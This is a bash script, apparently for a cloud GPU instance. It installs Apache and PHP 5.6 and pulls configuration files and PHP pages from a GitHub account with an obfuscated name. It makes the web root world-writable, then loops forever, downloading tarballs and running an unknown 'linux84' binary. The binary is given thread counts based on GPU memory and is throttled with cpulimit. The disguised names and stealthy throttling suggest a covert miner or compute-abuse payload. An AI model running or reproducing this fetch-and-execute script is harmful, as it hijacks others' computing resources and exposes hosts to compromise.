pkill -f linux84

apt-get update

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

mkdir /mnt/disks/

mkdir /mnt/disks/user/

mkdir /mnt/disks/user/project/

cd /mnt/disks/user/project/

apt-get install -y libcpprest-dev libgmp-dev libargon2-0-dev

apt-get install -y bc

apt-get install -y curl

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

apt-get install -y httpie

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

apt-get purge -y nginx

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

apt-get install -y apache2

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

apt-get install -y software-properties-common

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

add-apt-repository ppa:ondrej/php -y

rm -rf /var/lib/apt/lists/developer.download.nvidia.com_compute_cuda_repos_ubuntu1804_x86%5f64_Packages.lz4

apt-get install -y php5.6

cd /etc/apache2/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/ports.conf

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/apache2.conf

cd /etc/apache2/sites-enabled/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/000-default.conf

service apache2 restart

cd /var/www/html/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/index.php

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googlelinux84.php

rm -rf /var/www/html/index.html

chmod 777 -R /var/www/html/

cd /mnt/disks/user/project/

while true
do

chmod -R 777 ./

cd /mnt/disks/user/project/

string=$(curl -s http://localhost:8884/?linux84=linux8474)
if [[ $string == *"16384"* ]]; then

cd /mnt/disks/user/project/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/google84121274.tar.gz
tar -xf ./google84121274.tar.gz

chmod -R 777 ./

cd google84121274

pkill -f cpulimit

cpulimit -e google84121274 -l 62 &> /dev/null &

google84121274=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if (( $google84121274 >= 14884 && $google84121274 <= 18884 ))
then

./linux84 -t 10

fi

if (( $google84121274 >= 10884 && $google84121274 <= 14882 ))
then

./linux84 -t 8

fi

if (( $google84121274 >= 4888 && $google84121274 <= 10882 ))
then

./linux84 -t 4

fi

else

google841212121274="http://localhost:8884"

chmod -R 777 ./

cd /mnt/disks/user/project/

wget -q -N -q https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/googleapps84121274.tar.gz
tar -xf ./googleapps84121274.tar.gz

chmod -R 777 ./

cd googleapps84121274

pkill -f cpulimit

cpulimit -e google84121274 -l 62 &> /dev/null &

google84121274=$(nvidia-smi --query-gpu=memory.total --format=csv | sed 's/MiB//g' | sed 's/memory.total//g' | sed 's/\s+\n+\r+//g' | sed 's/\[//g' | sed 's/\]//g')

if (( $google84121274 >= 14884 && $google84121274 <= 18884 ))
then

./linux84 -t 10

fi

if (( $google84121274 >= 10884 && $google84121274 <= 14882 ))
then

./linux84 -t 8

fi

if (( $google84121274 >= 4888 && $google84121274 <= 10882 ))
then

./linux84 -t 4

fi

fi

done
